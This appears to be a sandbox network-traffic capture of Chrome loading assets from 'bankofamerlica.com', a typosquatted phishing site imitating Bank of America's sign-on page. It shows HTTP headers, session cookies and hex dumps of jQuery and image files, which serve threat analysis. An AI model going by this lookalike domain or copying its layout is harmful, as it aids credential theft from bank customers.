                                                                                              2025-01-15 18:42:00 UTC291INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Wed, 21 Feb 2024 11:42:48 GMT
                                                                                              ETag: "2aa8e2-611e2d371de00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2795746
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Content-Type: application/javascript
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 20 21 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 29 20 7b 0a 20 20 20 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 26 26 20 22 6f 62 6a 65 63 74 22 20 3d 3d 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 65 2e 64 6f 63 75 6d 65 6e 74 20 3f 20 74 28 65 2c 20 21 30 29 20 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 20 7b 0a
                                                                                              Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */ ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) {
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 20 21 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 2c 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 20 3d 20 4b 2e 74 65 73 74 28 43 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 2c 20 64 2e 67 65 74 42 79 49 64 20 3d 20 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: ElementsByTagName = ce(function(e) { return e.appendChild(C.createComment("")), !e.getElementsByTagName("*").length }), d.getElementsByClassName = K.test(C.getElementsByClassName), d.getById = ce(function(e) {
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 73 20 3d 20 66 28 65 2e 72 65 70 6c 61 63 65 28 24 2c 20 22 24 31 22 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 5b 53 5d 20 3f 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 2c 20 72 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 2c 20 6f 20 3d 20 73 28 65 2c 20 6e 75 6c 6c 2c 20 72 2c 20 5b 5d 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 3d 20 65 2e 6c 65 6e 67 74 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 61 2d 2d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: s = f(e.replace($, "$1")); return s[S] ? le(function(e, t, n, r) { var i, o = s(e, null, r, []), a = e.length; while (a--) {
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 61 70 65 53 65 6c 65 63 74 6f 72 20 3d 20 64 2e 65 73 63 61 70 65 3b 0a 20 20 20 20 76 61 72 20 68 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 2c 20 74 2c 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 20 3d 20 76 6f 69 64 20 30 20 21 3d 3d 20 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 28 65 20 3d 20 65 5b 74 5d 29 20 26 26 20 39 20 21 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 20 26 26 20 53 28 65 29 2e 69 73 28 6e 29 29 20 7b 0a 20 20 20 20 20
                                                                                              Data Ascii: apeSelector = d.escape; var h = function(e, t, n) { var r = [], i = void 0 !== n; while ((e = e[t]) && 9 !== e.nodeType) { if (1 === e.nodeType) { if (i && S(e).is(n)) {
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 61 63 65 28 7a 2c 20 55 29 0a 20 20 20 20 7d 0a 20 20 20 20 76 61 72 20 56 20 3d 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 39 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 7c 7c 20 21 2b 65 2e 6e 6f 64 65 54 79 70 65 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 47 28 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 65 78 70 61 6e 64 6f 20 3d 20 53 2e 65 78 70 61 6e 64 6f 20 2b 20 47 2e 75 69 64 2b 2b 0a 20 20 20 20 7d 0a 20 20 20 20 47 2e 75 69 64 20 3d 20 31 2c 20 47 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 63 61 63 68 65 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                              Data Ascii: ace(z, U) } var V = function(e) { return 1 === e.nodeType || 9 === e.nodeType || !+e.nodeType }; function G() { this.expando = S.expando + G.uid++ } G.uid = 1, G.prototype = { cache: function(e) {
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 75 29 20 26 26 20 59 2e 72 65 6d 6f 76 65 28 65 2c 20 22 68 61 6e 64 6c 65 20 65 76 65 6e 74 73 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 64 69 73 70 61 74 63 68 3a 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 2c 20 6e 2c 20 72 2c 20 69 2c 20 6f 2c 20 61 2c 20 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 20 3d 20 53 2e 65 76 65 6e 74 2e
                                                                                              Data Ascii: } } S.isEmptyObject(u) && Y.remove(e, "handle events") } }, dispatch: function(e) { var t, n, r, i, o, a, s = new Array(arguments.length), u = S.event.
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 74 79 6c 65 3b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 6e 20 3d 20 6e 20 7c 7c 20 49 65 28 65 29 29 20 26 26 20 28 22 22 20 21 3d 3d 20 28 61 20 3d 20 6e 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 74 29 20 7c 7c 20 6e 5b 74 5d 29 20 7c 7c 20 69 65 28 65 29 20 7c 7c 20 28 61 20 3d 20 53 2e 73 74 79 6c 65 28 65 2c 20 74 29 29 2c 20 21 79 2e 70 69 78 65 6c 42 6f 78 53 74 79 6c 65 73 28 29 20 26 26 20 4d 65 2e 74 65 73 74 28 61 29 20 26 26 20 46 65 2e 74 65 73 74 28 74 29 20 26 26 20 28 72 20 3d 20 73 2e 77 69 64 74 68 2c 20 69 20 3d 20 73 2e 6d 69 6e 57 69 64 74 68 2c 20 6f 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 2c 20 73 2e 6d 69 6e 57 69 64 74 68 20 3d 20 73 2e 6d 61 78 57 69 64 74 68 20 3d 20 73 2e 77 69 64 74 68 20 3d 20 61 2c 20 61
                                                                                              Data Ascii: tyle; return (n = n || Ie(e)) && ("" !== (a = n.getPropertyValue(t) || n[t]) || ie(e) || (a = S.style(e, t)), !y.pixelBoxStyles() && Me.test(a) && Fe.test(t) && (r = s.width, i = s.minWidth, o = s.maxWidth, s.minWidth = s.maxWidth = s.width = a, a
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 20 20 20 64 5b 72 5d 20 3d 20 76 20 26 26 20 76 5b 72 5d 20 7c 7c 20 53 2e 73 74 79 6c 65 28 65 2c 20 72 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 75 20 3d 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 74 29 29 20 7c 7c 20 21 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 72 20 69 6e 20 66 20 26 26 20 31 20 3d 3d 3d 20 65 2e 6e 6f 64 65 54 79 70 65 20 26 26 20 28 6e 2e 6f 76 65 72 66 6c 6f 77 20 3d 20 5b 68 2e 6f 76 65 72 66 6c 6f 77 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 58 2c 20 68 2e 6f 76 65 72 66 6c 6f 77 59 5d 2c 20 6e 75 6c 6c 20 3d 3d 20 28 6c 20 3d 20
                                                                                              Data Ascii: d[r] = v && v[r] || S.style(e, r) } } if ((u = !S.isEmptyObject(t)) || !S.isEmptyObject(d)) { for (r in f && 1 === e.nodeType && (n.overflow = [h.overflow, h.overflowX, h.overflowY], null == (l =
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 2c 20 65 2e 72 65 73 75 6c 74 20 3d 20 76 6f 69 64 20 30 2c 20 65 2e 74 61 72 67 65 74 20 7c 7c 20 28 65 2e 74 61 72 67 65 74 20 3d 20 6e 29 2c 20 74 20 3d 20 6e 75 6c 6c 20 3d 3d 20 74 20 3f 20 5b 65 5d 20 3a 20 53 2e 6d 61 6b 65 41 72 72 61 79 28 74 2c 20 5b 65 5d 29 2c 20 63 20 3d 20 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 5b 64 5d 20 7c 7c 20 7b 7d 2c 20 72 20 7c 7c 20 21 63 2e 74 72 69 67 67 65 72 20 7c 7c 20 21 31 20 21 3d 3d 20 63 2e 74 72 69 67 67 65 72 2e 61 70 70 6c 79 28 6e 2c 20 74 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 20 26 26 20 21 63 2e 6e 6f 42 75 62 62 6c 65 20 26 26 20 21 78 28 6e 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 73 20 3d 20 63 2e
                                                                                              Data Ascii: , e.result = void 0, e.target || (e.target = n), t = null == t ? [e] : S.makeArray(t, [e]), c = S.event.special[d] || {}, r || !c.trigger || !1 !== c.trigger.apply(n, t))) { if (!r && !c.noBubble && !x(n)) { for (s = c.
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20
                                                                                              Data Ascii: } } } } } } } return {


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.1659089188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC856OUTGET /assets/gfootb-static-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:26:56 GMT
                                                                                              ETag: "be1b-6118089398c00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 48667
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 32 08 06 00 00 00 6c f0 ea 07 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 35 71 b5 e3 36 00 00 01 88 70 72 56 57 78 9c ed 97 cd 51 c3 30 10 46 25 bc 31 eb 28 45 d0 02 e3 46 68 81 03 e2 9a 76 d4 0c 05 30 ea 85 0e 30 96 64 8d b0 31 c7 ec c2 f8 7b 93 1f 29 97 a7 6f 77 ed 71 de 3f df 3e cc d5 5c a7 69 8a 31 86 38 85 10 43 08 3e 44 ef e7 57 f0 de 8f 3e 8e 3e 8c e3 68 00 00 a0 c0 74 49 30 29 f9 89 b3 9f 58 c9 af 99 3f 65 27 b6 96 2c 95 a5 b0 3f 65 67 9a ed d6 96 a5 a0 bb f4 7d f5 53 e9 83 50 11 4a df 95 fc 94 ec 3b a6 5c 14
                                                                                              Data Ascii: PNGIHDR2lsBIT|dpHYs~tEXtSoftwareAdobe Fireworks CS5q6prVWxQ0F%1(EFhv00d1{)owq?>\i18C>DW>>htI0)X?e',?eg}SPJ;\
                                                                                              2025-01-15 18:42:00 UTC16384INData Raw: fa 6e 5e a7 7d 81 b6 ef 5a e6 f8 0f ba 79 44 9e eb 97 f3 cf ec b7 f3 35 e8 88 e9 ff e7 58 c9 7f a5 ff 57 76 f0 f4 a5 a7 4f 1d 1b 29 ed 22 fb b1 63 30 ce 1c cb 76 59 e0 93 d8 c5 0b 0c ff e7 5a f2 ef 7c 7e e0 b9 5f 25 2f cf 05 2c ce f4 7f 70 5c 80 cb c9 b9 79 ce b0 e7 5a f2 2f d0 c9 e9 3b 2f 78 86 17 d6 e1 ce 73 f5 fc 5f e9 06 b7 39 3f ff 1d ab 50 cc dc af 35 dd bb 5c ed 5b bd e3 79 7c de d9 02 18 c3 e7 f5 c4 8d 38 9d d4 cf dd f8 9f 67 00 e4 fb bf cb ca b1 4c 7b e4 3f 0c c3 30 0c c3 30 0c e7 18 5f e0 6b 33 be c0 e7 86 3e b4 92 e3 f8 02 9f 1b db dc c6 17 f8 7a e4 1a ab c9 f8 02 5f 83 9d fc c7 17 f8 fc 5c 53 fe e3 0b 7c 3c ae 29 ff 62 7c 81 8f c5 ca e7 37 be c0 61 18 86 61 18 86 61 78 6e 2e b5 95 74 eb 86 1c 61 7f 12 3f 6c c4 f7 5e 43 e3 95 df 11 76 6b ad ac
                                                                                              Data Ascii: n^}ZyD5XWvO)"c0vYZ|~_%/,p\yZ/;/xs_9?P5\[y|8gL{?00_k3>z_\S|<)b|7aaaxn.ta?l^Cvk
                                                                                              2025-01-15 18:42:00 UTC15899INData Raw: 8b 33 7a 0e 8b 81 8a 80 30 08 7f b0 16 ae 10 c1 63 38 a8 52 a3 ea 47 b1 a2 67 1f 9b 30 e0 f6 13 0c 02 a6 54 97 55 eb 1a f8 f2 84 bd bb 04 8b 9d 77 ad 22 2f 34 b3 de d6 8f 8f f7 bf be ee 43 be 51 60 5b 05 7b 4f b3 93 04 ba 63 c8 6e af 5d 95 03 b6 2b 95 7b db 7b ad e7 bc de d5 ce 0b 4e 11 21 81 33 95 81 3c ae de c7 56 ed 82 ec 79 78 e9 2c 21 43 0a e6 99 62 b2 2e a0 ea 08 6c 66 d6 d7 e5 c1 f8 27 0e 84 d2 c1 5c 20 d7 9f ce cf ed e3 eb 67 75 2c 10 ce bc b7 b8 9a 77 2d 2f 16 f4 df 33 db a5 f9 ba f1 ed 4e b0 ed e2 58 28 9b 63 0d 83 8e d3 e2 6f f5 4d 11 44 f0 91 73 ca 19 a2 61 b7 23 fc 23 30 7b 63 0d c1 c8 c0 f0 25 b5 75 44 57 43 42 01 13 a5 5a 80 41 e9 cd 5a 36 bb 2c d8 8f e7 fb 78 fd 0b 28 5a 25 87 b1 b5 d8 e7 77 80 d1 c0 e1 8a 48 62 06 68 54 62 32 f9 fe 3c 24
                                                                                              Data Ascii: 3z0c8RGg0TUw"/4CQ`[{Ocn]+{{N!3<Vyx,!Cb.lf'\ gu,w-/3NX(coMDsa##0{c%uDWCBZAZ6,x(Z%wHbhTb2<$


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.1659090188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC857OUTGET /assets/fsd-secure-esp-sprite.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC248INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:19:56 GMT
                                                                                              ETag: "1d9-611807030db00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 473
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:00 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0c 00 00 00 25 08 06 00 00 00 76 d6 08 19 00 00 01 a0 49 44 41 54 38 cb ed 94 39 8b 42 31 14 85 f3 53 15 f7 7d 43 41 11 51 10 4b b1 d2 3f 61 63 63 21 d8 d8 58 08 56 36 96 62 23 2a 8a e2 be 9d e1 5c cd d3 61 a6 98 14 af 9b c0 79 4b 92 2f f7 dc fb f2 a2 1e 8f 07 6e b7 1b 8e c7 23 a6 d3 29 da ed 36 ba dd 2e 26 93 09 74 db ef f7 b8 df ef 7c 54 8a d7 ed 76 8b 56 ab 85 5c 2e 07 bf df 2f 8a c7 e3 68 36 9b 38 9d 4e e0 a2 af a6 d4 66 b3 41 a7 d3 41 22 91 40 24 12 41 bd 5e 47 a3 d1 80 d7 eb 45 34 1a c5 70 38 14 07 16 40 2b d5 6a 15 c9 64 12 fd 7e 1f 5c 80 16 7a bd 9e f4 d5 6a b5 9f 40 20 10 10 1b ab d5 0a d7 eb 55 46 16 8b 05 1c 0e 07 5c 2e 17 0e 87 c3 1b 58 af d7 28 14 0a 28 95 4a 92 38 3d 5f 2e 17 ec 76 3b
                                                                                              Data Ascii: PNGIHDR%vIDAT89B1S}CAQK?acc!XV6b#*\ayK/n#)6.&t|TvV\./h68NfAA"@$A^GE4p8@+jd~\zj@ UF\.X((J8=_.v;


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.1659088188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC847OUTGET /assets/help-qm-fsd.png HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC249INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:25:08 GMT
                                                                                              ETag: "c94-6118082c99900"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 3220
                                                                                              Connection: close
                                                                                              Content-Type: image/png
                                                                                              2025-01-15 18:42:00 UTC3220INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 0a 4f 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 67 54 53 e9 16 3d f7 de f4 42 4b 88 80 94 4b 6f 52 15 08 20 52 42 8b 80 14 91 26 2a 21 09 10 4a 88 21 a1 d9 15 51 c1 11 45 45 04 1b c8 a0 88 03 8e 8e 80 8c 15 51 2c 0c 8a 0a d8 07 e4 21 a2 8e 83 a3 88 8a ca fb e1 7b a3 6b d6 bc f7 e6 cd fe b5 d7 3e e7 ac f3 9d b3 cf 07 c0 08 0c 96 48 33 51 35 80 0c a9 42 1e 11 e0 83 c7 c4 c6 e1 e4 2e 40 81 0a 24 70 00 10 08 b3 64 21 73 fd 23 01 00 f8 7e 3c 3c 2b 22 c0 07 be 00 01 78 d3 0b 08 00 c0 4d 9b c0 30 1c 87 ff 0f ea 42 99 5c 01 80 84 01 c0 74 91 38 4b
                                                                                              Data Ascii: PNGIHDRapHYs~OiCCPPhotoshop ICC profilexSgTS=BKKoR RB&*!J!QEEQ,!{k>H3Q5B.@$pd!s#~<<+"xM0B\t8K


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.1659095188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:00 UTC858OUTGET /assets/powered_by_logo.svg HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:00 UTC254INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:00 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 14:09:16 GMT
                                                                                              ETag: "144a-611804a0b3b00"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 5194
                                                                                              Connection: close
                                                                                              Content-Type: image/svg+xml
